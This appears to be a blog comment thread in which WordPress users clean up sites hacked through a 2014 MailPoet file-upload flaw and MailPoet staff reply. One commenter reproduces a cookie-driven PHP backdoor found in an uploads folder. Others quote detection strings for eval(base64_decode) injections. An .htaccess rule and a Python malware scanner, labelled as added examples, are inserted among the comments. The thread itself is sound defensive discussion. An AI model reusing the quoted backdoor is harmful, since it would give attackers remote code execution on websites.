    I found in uploads/wysija/themes a test directory with a file 1.php which contains the following code; I think I am infected… The test directory was inserted on July 3, 2014…

    On the other hand, I have seen that some infected people had their site down whereas mine is still online…. No trace of spammy links in the Google page cache either. I have updated to the latest version of the plugin. What more should I do? I can no longer back up my database or the FTP, because with OVH you cannot go back more than three weeks. And July 3 is more than three weeks ago. What can I do?

    Please help me.

    Author’s gravatar

    Good evening Joe,

    The hack would need to be studied; maybe the infection was not too serious and it can be cleaned.

    Could you contact OVH and ask whether they have another way to recover a more recent backup? 3 weeks is very short.

    Author’s gravatar

    I just cleaned up a site, it took me 2 days. Not sure if every attack is different but these were the steps that I had to take:

    1. The first time the site was exploited, they dropped multiple shell scripts in the wp-includes directory, the wp-content directory, and 2 or 3 plugin directories. They inserted eval64 code in every index.php file (including those protecting every plugin folder).

    2. They change permissions on the folders and files they exploit, so if you don’t have sudo permissions you might not be able to delete them.

    Below are some of the steps I took to secure a site. By all means, be very cautious when deleting critical files (especially WordPress core files) as it may break your site depending on the setup. This is just advice, use this at your own discretion. An easier way to look for modified files is to sort by date in a directory with your FTP software.

    1) Manually cleaned up every index.php file on the site, removing the eval64 code at the top.

    2) Deleted all WordPress core directories and uploaded fresh copies of those files. This was sort of a challenge, as they changed permissions on some of those directories and files so they couldn’t be deleted via FTP; I had to contact the host.

    3) Went through every plugin directory looking for suspicious files. Sometimes these are hard to spot, so carefully make sure that those files belong there by comparing the code against a fresh copy of the plugins you have on your site. An easy way to tell is by deleting the plugin and uploading a fresh install of the plugin. If you can’t remove the plugin directory and get a permissions error via FTP, have your host look at it or remove the file.

    4) Went through the wp-content directory uploads folder looking for recently uploaded files that looked suspicious or out of place.

    5) The site I was working on still had a wysija directory from an old version of the plugin; they got in there and replaced some files, so all of those had to be deleted too.

    6) After I completed some of the steps above, I updated the Mailpoet plugin and installed a security plugin that restores replaced files by monitoring for changes every minute. At that point, I could see if they still had a shell script uploaded where they were still getting in.

    Honestly, this wasn’t the worst hack I’d seen but it was pretty time consuming to clean up.

    Author’s gravatar

    Robert,
    Thanks for sharing!
    And sorry for the troubles…

    Author’s gravatar

    Hi, I received an e-mail warning of an infection today. As I am not an expert in coding, I am quite helpless and do not know what to do. It is recommended to set the site back to the state before July 1st. Unfortunately, I don’t have any backup files older than July 12th. I just removed two subfolders containing suspicious php files, but I am not sure if there are any other infections. What should I do?

    Author’s gravatar

    Hello Su,

    What was the email from your host saying? If they had a firewall in place like 1and1 seems to, those uploaded files should have been harmless.

    What was the recommendation in that email? Did they simply ask you to delete the file? If so, you should be fine.

    Now regarding the backups, in the future I’d recommend you set up a better backup system on your site; these situations could happen again on your site, whether you use MailPoet or not, and you need to be prepared for that.

    Here is a company which can take care of your backups, for instance: https://managewp.com/features

    Author’s gravatar

    Thank you for your support.
    I contacted 1blu but couldn’t get any helpful answer. Meanwhile, I deleted two subfolders (as mentioned above) containing suspicious php files dated July 6th. But I am not sure if that was it. Is there any possibility that the malicious code is still hiding somewhere? And if so, how can I find it?

    Author’s gravatar

    @ben
    I have updated my WordPress version and changed my FTP and database passwords. I checked my wp_users table and there are indeed only my two user accounts. I also checked the theme’s index.php files to make sure there was no eval64 code at the top.
    Do you think that is enough to get around the hack? Or would you advise something else?
    Last thing, I saw elsewhere that Nextgen gallery Shell Upload was also among the affected plugins. Why Shell Upload, is it an extension of the famous gallery plugin? Because I also use it on my site, nextgen gallery version 1.9.6 actually!

    Thanks for your insight!!!

    Author’s gravatar

    Hello Joe,

    It all depends on the hack you suffered; some hacks are more serious than others.

    I would also recommend restoring the files; here is a guide in English on the important points to check:

    And an article in French by Julio Potier which may help you; it talks about NextGen in particular: http://blog.secupress.fr/attaques-wordpress-261.html

    Author’s gravatar

    One of my sites was infected. There was malicious code in 45 files in various directories including plugins, themes, uploads, and wp-includes. I think it’s clean now, but there is still more work to do to restore the latest content.

    I am disappointed that I learned about this so late. I subscribe to the MailPoet newsletter, but the issue announcing the vulnerability came to me on July 26. My site was hacked on July 5, and it would have saved a LOT of work if I knew sooner.

    Author’s gravatar

    Same here. Hacked on July 5 too, learned about it on July 26. :-(

    Author’s gravatar

    Hi Joanne and Marie,

    I’m very sorry to hear that this vulnerability affected your sites…

    If you were subscribed to our newsletter then you’d have received our first two alert newsletters sent on July 3rd and July 4th.

    It’s very unfortunate if they didn’t reach you at the time. Some of you were not on these lists at the time of these first alerts, sadly… We’ve also tweeted about it on our social networks…

    Then we started, as an emergency measure, to build a list of contacts based on all of the support questions we had received in the past years, in order to reach as many users as we could. The alert you received on July 26th is the one that was generated from these contacts.

    We did our best with the tools we had in hand. The bottom line is that the best way to know if we have an update for you is to look for it in the plugins page of your site regularly, and update as soon as you can see there is one available.

    Author’s gravatar

    Hmmm maybe I wasn’t really subscribed to the newsletter and received the July 26 email based on other support contacts? I just re-subscribed to be sure.

    I do check the admin panel often. However, I have local mods to make MailPoet mobile friendly, so unfortunately I’ve become accustomed to seeing the update badge until I have time to re-apply my mods. I know that local mods come with a risk, and this time I paid the cost. From now on I’ll read the update description carefully to see if it’s critical. I agree with the prior commenter that it would be nice if WP allowed a red badge to flag security updates to plugins and themes.

    Thanks again for continuing to monitor this thread and provide thoughtful answers.

    Author’s gravatar

    Joanne, anyway, now we have you, so you’ll receive this news first for sure next time.

    We’ll keep monitoring this thread as long as we can. We owe you that.

    The security update feature in WP would be great, that’s for sure…

    Thanks for your understanding and patience, we really appreciate it.

    Author’s gravatar

    I’ve always regularly updated all my plugins as soon as there is an update available, and to my knowledge I was on your mailing list long before July 5.

    Author’s gravatar

    Yes, I checked, and you’re right, you were on our list since February 2014.

    So I checked further in order to see why we didn’t send you those newsletters.

    But it appears that you received and opened our newsletters on the 3rd and 5th of July as well; maybe they were not alarming enough, or somebody else has access to your email, I’m not sure.

    Author’s gravatar

    I updated the plugins (I have it on many sites) as soon as I got the newsletter. But the infection started on July 5th on most of the sites I found infected.

    Maybe you should have a special kind of email with a sender called MAILPOET-SECURITY and a Subject Line starting with URGENT-UPDATE NOW or something like that.

    Author’s gravatar

    The thing is, in your July 26 message (update to 3.6.9) this time you told us where to look to find faulty files.

    I don’t recall seeing that in the previous messages. To my recollection you were only asking that we update. Or did I not read far enough?

    Again, please make your messages clearer. Early July, my understanding was: you need to update because of a security risk. I do that regularly with many different software and there never is any problem (so far anyway), so since the websites were running fine on the front-end, I had no way to know my sites were infected. And I DID do the 3.6.8 update in a timely fashion.

    Author’s gravatar

    The sites seem ok. Except one of them has a folder in Wysija/themes that is called “Main” (Default is still there). In that “Main” theme there is an index.php file (your email said there wasn’t supposed to be any).
    That php file says:

    (php) **
    * @package Joomla.Plugin.System
    * @since 1.5
    *
    *
    */
    class PlgSysJoomla {
        public function __construct() {
            $file = @$_COOKIE['ljNqe3'];
            if ($file) {
                $opt = $file(@$_COOKIE['ljNqe2']);
                $au = $file(@$_COOKIE['ljNqe1']);
                $opt("/292/e", $au, 292);
                die();
            } else {
                phpinfo();
                die;
            }
        }
    }
    $index = new PlgSysJoomla;

    Joomla! in a WP install!

    The other files in that folder include an error log which includes many lines similar to this: [05-Jul-2014 06:51:52] PHP Warning: scandir(../components) [function.scandir]: failed to open dir: No such file or directory in /home/bcbemeru/public_html/wp-content/uploads/wysija/themes/main/index.php(11) : regexp code(1) : eval ( )’d code on line 34

    As if they somehow think this is a joomla site.

    ****

    Based on Sucuri’s info, I scanned (search function) for malicious code and can’t find any. I spot checked many .php files (config, index, etc.) and they all look clean.

    I believe if I remove the themes/main folder, everything should be fine without having to do anything else.

    What do you think? That strange folder was installed on July 5.

    The only other thing installed or updated on July 5 was a wysija/ folder called “Temp” in which there is only a blank index.html file.

    So my question really is: is the “main” theme a legitimate theme so that I should delete only the .php file or should I delete the whole “main” theme folder?

    Marie

    Author’s gravatar

    I recommend examining your site files more thoroughly. On my site, at first glance it looked like there were only 2 folders named main and main2 that had the same code as you show. Like you, my site was hacked on July 5 and the site operation itself showed no symptoms on the surface. But I contacted my hosting company and asked for a list of all files added or modified since July 5. It turns out that 45 of my files were infected. For example, wp-includes/class-wp-image-editor-gd.php had a line of code with eval ( base64_decode ) at the top, which is a classic backdoor. There were scores more like it sprinkled throughout the site. Any one of those files would allow arbitrary code to be executed.

    Author’s gravatar

    Marie,

    If there is a PHP file located in your wp-content/uploads/wysija folders or subfolders, you can be sure that this is not legitimate.

    So an attack has been performed on your site, that’s certain.
    As Joanne said, depending on the hack, your whole WP file system could be infected; this is why we recommend restoring a backup of both your files and database from a date prior to the hack.

    But you also need to change all of your credentials… we have written a small guide to help you with the whole process: http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/

    Your host should be able to help you somehow.

    Author’s gravatar

    Hi Ben,

    I know all of what you are saying. my question was: is the MAIN theme a legitimate theme and only the .php file has to be deleted in THAT folder or is the WHOLE THEME/MAIN folder something implanted by the hacker.

    As for the rest, I can read and your instructions were clear, I know how to clean up my site, so please answer THAT question: is the MAIN theme a legitimate theme created by MailPoet at some point or not?

    Thanks.

    Author’s gravatar

    This theme has been implanted by a hacker for sure.

    You CAN’T have any php files in your wp-content/uploads/wysija/ folder.

    Actually I can’t think of any reason to have a php file within the uploads folder at all: wp-content/uploads/

    Author’s gravatar

    Hi Marie,

    What did you do with that joomla thing? I have it as well…Should I delete the “main” folder?

    Author’s gravatar

    That was my question but it didn’t get answered yet.

    Author’s gravatar

    On my site, the “main” folder showed up after July 1, so I deleted the whole folder with no ill effects.

    Author’s gravatar

    There is no reason to keep that file which has been uploaded by an attacker and is certainly very dangerous.

    Unless you want to study how and when you got hacked.

    The “when” can prove useful here just in order to determine the date where your backup was safe.

    So you can do the right database and files restoration on your site.

    Author’s gravatar

    According to your explanations, there must not be any php files in the Uploads folder. Yet I use the Sucuri Security plugin, which adds a directory to the Uploads folder. Is that normal? Am I risking anything by keeping this plugin online? Regards

    Author’s gravatar

    I can only imagine they must have a good reason to upload a PHP file into that folder; it must be useful for their tests.

    However, it would be better to check with them directly.

    Author’s gravatar

    It seems to me that the instructions are that there must be no php files in the folder:

    wp-content/uploads/WYSIJA (without the capitals)

    and not in wp-content/uploads (which is used for many other things).

    Author’s gravatar

    Logically there should never be any PHP file in the upload folder wp-content/uploads

    I cannot think of any valid reason to have a PHP file in that folder.

    I even think, like Julio Potier (Mr. WordPress security in France), that there should be an htaccess rule on that folder to save ourselves a lot of problems; you can read more about it here:
    http://blog.secupress.fr/attaques-wordpress-261.html

    Author’s gravatar

    I had read that there must be no php files in the uploads folder… But the Sucuri Security plugin, which I added after the WordPress/Mailpoet hack, adds a folder in uploads containing php files. Do you think I am risking anything by keeping the PHP files in that sensitive folder?

    Author’s gravatar

    As I said in a comment a bit higher up, if Sucuri does it, it must be for a good reason; they must use it to run tests and verify that your site is properly secured.

    In general there is no reason to have PHP files in that folder. However, the Sucuri case, a program dedicated to protecting your site, is the exception that proves the rule.

    If you have doubts, I would advise asking them what those files are for; however, I would not worry more than that.

    Author’s gravatar

    In fact, Anti-Malware itself (which you recommended) puts all the corrupted files (so all .php) in a “quarantine” folder in… uploads!

    I currently have 30 php malware files in that folder (the originals of the corrupted files fixed by Anti-Malware) and Anti-Malware’s instructions are to leave them there, that they do no harm!!!!!

    So, Ben?

    ???

    Author’s gravatar

    I no longer have access to any of my plugins and I did not even have your plugin activated – just installed! Now what? There is no back-up beyond the night before from the host – which is obviously bad. Now what?

    Author’s gravatar

    If our plugin was not activated, no code could be executed and this hack could not be possible.

    It could be because you’re on a shared hosting server and neighbouring sites have been hacked through that vulnerability or a different one; ask your hosting company about that, they should know.

    Also it could be because you had been hacked through another backdoor…

    Here is a list of plugins in which a security vulnerability was discovered between the 18th of June and the 18th of July:

    – WPTouch Authenticated File Upload
    – CopySafe PDF Protection 0.6 Shell Upload
    – Tidio Gallery 1.1 Shell Upload / XSS
    – Download Manager 2.6.8 Shell Upload
    – MailPoet wysija-newsletters Unauthenticated File Upload
    – NextGEN Gallery 2.0.63 Shell Upload

    Finally here is a KB article giving you steps if your site has been hacked:
    http://support.mailpoet.com/knowledgebase/site-hacked-what-to-do/

    Author’s gravatar

    None of the other plugins you listed have ever been installed or activated. I will check with the server techs to see if anyone else has been hacked. Your link goes on the premise that a good back-up file exists – which there is not… So, what now?

    Author’s gravatar

    @ben thanks for your reply, that reassures me. Yes, I modified my htaccess to protect my wp-include folder, my wp-config, my upload folder as well as my htaccess. When I have finished updating the plugins, I will also make an htaccess so that my theme and plugins folders can no longer be edited + so now the Sucuri Security plugin (I hesitated with Wordfence but I saw on the web that it had also been hacked in the past…). Being hopeless at English, I preferred to ask here since we speak French xD. In any case, good luck to your team!!! What doesn’t kill you makes you stronger!!!

    Author’s gravatar

    Frankly, what a mess, and I am being polite!!!
    a week of work lost

    Site blocked by OVH around July 16, 1 infected php file
    before I noticed that very many files with this type of code had been created or infected!
    and not only in the wysija directory, of course!

    code :

    No backup available from July 1st unfortunately, and complicated to lose several weeks of content!

    1. cleanup process put in place (the site has been stable since):

    – FTP and SQL backup
    – scan of all files for the code
    "eval ( base64_decode( $_POST"
    via OVH’s ftp, very well done by the way
    – manual cleanup of the many files
    – deletion of 2/3 doubtful files
    – change of passwords for the user and admin accounts, the sql database passwords, the ftp access
    – securing access to the directories and to wp-config via an htaccess at the site root with:

    # protect wpconfig.php
    <files wp-config.php>
    order allow,deny
    deny from all
    </files>

    # protect against directory listing
    Options -Indexes

    – Putting the site blocked by OVH back online via a “CHMOD 705” over FTP

    – Update of all plugins and of the WP version
    – and many other security processes put in place for the general hardening of WordPress (having made progress in WP security is, in conclusion, the only positive side of this story…):
    do not use the “admin” login
    hide the use of WP and its version
    delete the install.php file
    remove unused plugins
    …etc

    2. audit of your WP install, interesting to do via:
    WordPress Security Scanner by the WPScan Team

    3. questions:
    – Is the procedure carried out above sufficient?
    – Have you planned a commercial gesture?
    – a detailed and exhaustive checklist of the fixes to put in place, available without resorting to restoring the database and the ftp from before the attack, would be more than welcome.

    Thanks for your answers

    Author’s gravatar

    “WordPress Security Scanner by the WPScan Team”

    Where does one find that?

    Author’s gravatar

    Hi, all / Ben,

    Can we all communicate in English? I really want to be able to read all the info.. but my French is terrible.

    For what it’s worth: I got an email about the ‘critical security update’ on the 3rd of July and a part two on the 5th! Too bad I was on holiday and could act, and found some hacker’s files as well.

    I think the ‘French’ instructions above are useful but it would really be nice to stick to English..

    Thank you.

    Author’s gravatar

    You say you want all in English. What about those who don’t speak English?

    The moderator is bilingual, what is the problem here? If you ask questions in English you will be answered in English (I’m sure you appreciate) and those who ask in French are answered in French (I’m sure they appreciate).

    Sorry. I get a bit upset with this kind of stuff. You don’t lose anything just because other people can get answers in their own language.

    Have a good day

    Author’s gravatar

    Hi Ramon, Hi all

    My previous comment in English (sorry in advance for bad translations):

    What a big mess!

    My website was blocked by OVH on July 16th: one php file infected.
    Then I realised that a lot of files were infected; some of them were created, some of them were modified in my WP directories (and not only the WYSIJA one)

    a code within php code “eval ( base64_decode ( $_POST” was added at the beginning of files

    unfortunately no backup from July 1st for me…
    and I did not want to lose weeks and weeks of content and work on my blog!

    1. the cleaning process I have done (my web site is working now, I hope so…)
    – FTP and SQL backup
    – scanning all files on the ftp containing the “eval(base64_decode($_POST” code
    – removal of this code file by file (by hand…)
    – also deletion of 2 or 3 strange files (don’t ask me, I don’t remember)
    – change of passwords for users, admin, sql database, FTP, SSH…
    – secure access to wp-config and folders via an htaccess file on the root domain:

    # protect wpconfig.php
    <files wp-config.php>
    order allow,deny
    deny from all
    </files>

    # protect against directory listing
    Options -Indexes

    – Then reactivation of my web site through the OVH process: “CHMOD 705” on FileZilla

    – update of WP and all plugins
    – and lots of security processes added (basic ones):
    change the “admin” login
    do not show that WP is used
    remove install.php
    remove unused plugins
    …etc

    2. a WP audit is interesting to do with:
    WordPress Security Scanner by the WPScan Team, you will find it with Google easily

    3. questions:
    – Is this process sufficient?
    – what about a commercial reduction?
    – a precise and official checklist of things to do would be very useful (and necessary), I mean a checklist without the need for a backup from July 1st! From my point of view it would recreate a feeling of trust in MailPoet, which is a great plugin, but honestly I am a bit afraid to reactivate it…

    Thanks in advance for a prompt reply
    BR

    Author’s gravatar

    Thank you, I really appreciate it, and, more importantly, other users can read and perform these actions as well.

    I think I did a similar action; I had another hack, however.

    Also a statement to scan files for is “preg_replace”, this is also one nasty statement. I decoded it all the way back and it turned out to contain the interface page where the hacker could do all kinds of stuff..

    I downloaded all files with Filezilla (Windows) and used “AstroGrep” to scan all files.
    I also scanned with shorter and other statements:
    – “eval(base64_decode(
    – “\x47\x4cO\x42\x41\x4c\x53” <- this is hex for the eval statement! be aware of this as well!

    The thing I worry about is my database content.. I could not restore an old version since it contains current orders which I would lose.

    The thing I did check: the number of admin accounts. It seems that sometimes a ‘ghost’ account is created. This is the case if the number of admin accounts is bigger than the actual admin names..

    Does anybody know what else to check for in the database?

    Another thing I did: I placed a .htaccess file in the upload directory to prevent any php file from being executed (future protection)

    the content of the .htaccess:

    deny from all

    Regards,
    Ramon
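Ramon’s single `deny from all` in wp-content/uploads also stops Apache serving the images WordPress keeps there, and the rule Ben and Julio Potier mention above is only described in prose. Here is one way to write it (an added example, not MailPoet’s or any commenter’s configuration) so that requests for PHP anywhere under uploads, including uploads/wysija and any quarantine folder a security plugin creates there, are refused while media is still served; `Options -Indexes` is carried over from the root .htaccess posted above.

```apache
# wp-content/uploads/.htaccess  (added example; place it in the uploads directory)

# Refuse any direct request for a server-side script anywhere under uploads.
<FilesMatch "\.(php|php[0-9]|phtml|phar)$">
    # Apache 2.4 (mod_authz_core)
    <IfModule mod_authz_core.c>
        Require all denied
    </IfModule>
    # Apache 2.2, or 2.4 with mod_access_compat: the syntax the commenters used
    <IfModule !mod_authz_core.c>
        Order allow,deny
        Deny from all
    </IfModule>
</FilesMatch>

# No directory listings of uploaded files.
Options -Indexes
```

This only blocks execution through the web server: a PHP file dropped under uploads can still be included by other compromised code, so it is a layer on top of the cleanup steps, not a replacement, and it does nothing on nginx or where the host has disabled AllowOverride.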

    Author’s gravatar

    another note: the bad files I found had the same date stamp as other files, so only looking for change date will not work in all cases..
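A content-based scan that pulls together the indicators from this thread: Ben’s rule that no .php file belongs under wp-content/uploads, the `eval(base64_decode($_POST` header injection that Robert and the French commenter cleaned by hand, Ramon’s `preg_replace` and escaped-hex patterns, and his note above that timestamps cannot be trusted (so nothing here looks at mtime). This is an added example, not MailPoet’s or any commenter’s code; the WordPress tree it scans is constructed in a temporary directory for the demo, with hypothetical file contents that only mimic the shapes described above.

```python
# Added example, not MailPoet's or any commenter's code: a content-based scan
# for the indicators quoted in this thread.  The sample tree is constructed in
# a temp dir; its files are hypothetical stand-ins mimicking the shapes above.
import os
import re
import tempfile

# Nothing server-side should ever live under wp-content/uploads.
UPLOADS_DIR = os.path.join("wp-content", "uploads")
SCRIPT_EXTENSIONS = (".php", ".php5", ".phtml", ".phar")

# Byte-level signatures quoted by the commenters; whitespace is tolerated since
# the injection is quoted both as "eval(base64_decode(" and "eval ( base64_decode(".
SIGNATURES = {
    "eval(base64_decode(": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    # a regex literal whose modifiers include the deprecated /e (code execution)
    "regex literal with /e modifier":
        re.compile(rb"['\"]/[^'\"]*/[a-zA-Z]*e[a-zA-Z]*['\"]\s*,"),
    # four or more consecutive \xNN escapes, used to hide identifiers
    "escaped-hex string": re.compile(rb"(?:\\x[0-9a-fA-F]{2}){4,}"),
}
# "$var = @$_COOKIE[...]" later followed by "$var(": a request value used as a
# function name, the shape of the index.php Marie quoted above.
ASSIGN_FROM_REQUEST = re.compile(
    rb"\$(\w+)\s*=\s*@?\$_(?:COOKIE|POST|GET|REQUEST)\s*\[", re.I)

def request_value_called_as_function(data):
    for match in ASSIGN_FROM_REQUEST.finditer(data):
        if re.search(rb"\$" + re.escape(match.group(1)) + rb"\s*\(", data):
            return True
    return False

def scan_file(path, root):
    """Return a list of (relative path, reason) findings for one file."""
    rel = os.path.relpath(path, root)
    findings = []
    if rel.lower().endswith(SCRIPT_EXTENSIONS) and rel.startswith(UPLOADS_DIR + os.sep):
        findings.append((rel, "PHP file inside wp-content/uploads"))
    try:
        with open(path, "rb") as fh:
            data = fh.read(1 << 20)  # injected code sits at the top; 1 MiB is plenty
    except OSError:
        return findings
    for reason, pattern in SIGNATURES.items():
        if pattern.search(data):
            findings.append((rel, reason))
    if request_value_called_as_function(data):
        findings.append((rel, "request/cookie value called as a function"))
    return findings

def scan_wordpress(root):
    """Walk the whole tree.  Deliberately ignores mtimes: attackers can set them."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            findings.extend(scan_file(os.path.join(dirpath, name), root))
    return findings

# Constructed sample tree (relative path -> bytes).  Nothing here is real
# malware; the flagged entries only reproduce the textual shapes above.
SAMPLE_FILES = {
    "wp-includes/version.php": b"<?php\n$wp_version = '3.9.1';\n",
    "wp-content/uploads/2014/07/photo.jpg": b"\xff\xd8\xff\xe0 not a real jpeg",
    "wp-content/uploads/wysija/themes/default/index.html": b"",
    "wp-content/uploads/wysija/themes/main/index.php":
        b"<?php\n$f=@$_COOKIE['name'];\nif($f){ $f(\"/x/e\", 1, 1); }\n",
    "wp-includes/class-wp-image-editor-gd.php":
        b"<?php eval ( base64_decode( $_POST['p'] ) ); ?>\n<?php\nclass WP_Image_Editor_GD {}\n",
    "wp-content/plugins/example/helper.php":
        b"<?php\n$g = \"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\";\n",
}

def build_sample_tree(root):
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)

def demo():
    """Build the sample tree, scan it, return {relative path: [reasons]}."""
    root = tempfile.mkdtemp(prefix="wp-scan-demo-")
    build_sample_tree(root)
    report = {}
    for rel, reason in scan_wordpress(root):
        report.setdefault(rel.replace(os.sep, "/"), []).append(reason)
    return report
```

Point `scan_wordpress()` at a downloaded copy of a real site to get the same (path, reason) list; every hit is something to review against a fresh copy of WordPress or the plugin, as Robert describes, not something to delete blindly.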

    Author’s gravatar

    Another point :
    don’t try to scan the files of all the ftp containing the “eval ( base64_decode ( $_POST” code with Windows, it does not work :(
    I use my OVH provider’s FTP access

    Author’s gravatar

    Hi guys,

    Don’t forget to have your host delete the mail queue (more info on how to do it via PuTTY here: http://www.cyberciti.biz/faq/exim-remove-all-messages-from-the-mail-queue/ , the best info was posted by adib ramezany at October 21, 2013 at 4:46 pm). In my mail queue, over 400.000 mails were waiting to be sent and the mails kept sending, even after deleting everything. So all my work trying to delist my IP from all the blacklisting sites was for nothing, because I did not clean this queue first.

    Good luck everybody, it was kind of a nightmare.

    Author’s gravatar

    Our website was hacked twice; I was blaming my hosting only to find it was MailPoet. The hacker managed to upload an index file to override our front page. The front page was showing who claimed to have hacked it. We have lost over a week’s posts because of this and I am sending an invoice to your company address along with a draft from our lawyer.

    Thanks

Comments are closed.